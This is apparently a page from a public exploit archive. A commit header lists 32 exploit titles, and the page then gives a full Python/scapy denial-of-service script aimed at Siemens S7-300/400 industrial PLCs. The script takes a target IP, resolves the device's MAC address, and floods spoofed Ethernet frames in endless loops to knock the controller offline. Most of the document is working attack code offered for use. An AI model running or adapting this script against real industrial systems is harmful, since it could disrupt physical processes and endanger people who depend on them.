1472d8e723
32 changes to exploits/shellcodes Siemens S7 Layer 2 - Denial of Service (DoS) TRIGONE Remote System Monitor 3.61 - Unquoted Service Path Automox Agent 32 - Local Privilege Escalation ConnectWise Control 19.2.24707 - Username Enumeration Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS) AWebServer GhostBuilding 18 - Denial of Service (DoS) TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated) Dixell XWEB 500 - Arbitrary File Write Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated) CMSimple 5.4 - Cross Site Scripting (XSS) RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated) RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated) RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) Movie Rating System 1.0 - SQLi to RCE (Unauthenticated) Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS) SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS) Nettmp NNT 5.1 - SQLi Authentication Bypass Hostel Management System 2.1 - Cross Site Scripting (XSS) Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated) BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated) Hospitals Patient Records Management System 1.0 - Account TakeOver Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated) Vodafone H-500-s 3.5.10 - WiFi Password Disclosure openSIS Student Information System 8.0 - 'multiple' SQL Injection Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS) WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
105 lines
No EOL
3 KiB
Python
Executable file
105 lines
No EOL
3 KiB
Python
Executable file
# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS)
|
|
# Date: 21/10/2021
|
|
# Exploit Author: RoseSecurity
|
|
# Vendor Homepage: https://www.siemens.com/us/en.html
|
|
# Version: Firmware versions >= 3
|
|
# Tested on: Siemens S7-300, S7-400 PLCs
|
|
|
|
|
|
#!/usr/bin/python3
|
|
|
|
from scapy.all import *
|
|
from colorama import Fore, Back, Style
|
|
from subprocess import Popen, PIPE
|
|
from art import *
|
|
import threading
|
|
import subprocess
|
|
import time
|
|
import os
|
|
import sys
|
|
import re
|
|
|
|
# Banner
|
|
|
|
print(Fore.RED + r"""
|
|
|
|
▄▄▄· ▄• ▄▌▄▄▄▄▄ • ▌ ▄ ·. ▄▄▄· ▄▄▄▄▄ ▄▄▄
|
|
▐█ ▀█ █▪██▌•██ ▪ ·██ ▐███▪▐█ ▀█ •██ ▪ ▀▄ █·
|
|
▄█▀▀█ █▌▐█▌ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄
|
|
▐█ ▪▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌
|
|
▀ ▀ ▀▀▀ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀
|
|
▄▄▄▄▄▄▄▄ .▄▄▄ • ▌ ▄ ·. ▪ ▐ ▄ ▄▄▄· ▄▄▄▄▄ ▄▄▄
|
|
•██ ▀▄.▀·▀▄ █··██ ▐███▪██ •█▌▐█▐█ ▀█ •██ ▪ ▀▄ █·
|
|
▐█.▪▐▀▀▪▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄
|
|
▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌
|
|
▀▀▀ ▀▀▀ .▀ ▀▀▀ █▪▀▀▀▀▀▀▀▀ █▪ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀
|
|
""")
|
|
|
|
time.sleep(1.5)
|
|
|
|
# Get IP to exploit
|
|
|
|
IP = input("Enter the IP address of the device to exploit: ")
|
|
|
|
# Find the mac address of the device
|
|
|
|
Mac = getmacbyip(IP)
|
|
|
|
# Function to send the ouput to "nothing"
|
|
|
|
def NULL ():
|
|
|
|
f = open(os.devnull, 'w')
|
|
sys.stdout = f
|
|
|
|
# Eternal loop to produce DoS condition
|
|
|
|
def Arnold ():
|
|
|
|
AutomatorTerminator = True
|
|
|
|
while AutomatorTerminator == True:
|
|
Packet = Ether()
|
|
Packet.dst = "00:00:00:00:00:00"
|
|
Packet.src = Mac
|
|
sendp(Packet)
|
|
NULL()
|
|
def Sarah ():
|
|
|
|
AutomatorTerminator = True
|
|
|
|
while AutomatorTerminator == True:
|
|
Packet = Ether()
|
|
Packet.dst = "00:00:00:00:00:00"
|
|
Packet.src = Mac
|
|
sendp(Packet)
|
|
NULL()
|
|
def Kyle ():
|
|
AutomatorTerminator = True
|
|
|
|
while AutomatorTerminator == True:
|
|
Packet = Ether()
|
|
Packet.dst = "00:00:00:00:00:00"
|
|
Packet.src = Mac
|
|
sendp(Packet)
|
|
NULL()
|
|
|
|
# Arnold
|
|
ArnoldThread = threading.Thread(target=Arnold)
|
|
ArnoldThread.start()
|
|
ArnoldThread.join()
|
|
NULL()
|
|
|
|
# Sarah
|
|
|
|
SarahThread = threading.Thread(target=Sarah)
|
|
SarahThread.start()
|
|
SarahThread.join()
|
|
NULL()
|
|
|
|
# Kyle
|
|
|
|
KyleThread = threading.Thread(target=Kyle)
|
|
KyleThread.start()
|
|
KyleThread.join()
|
|
NULL() |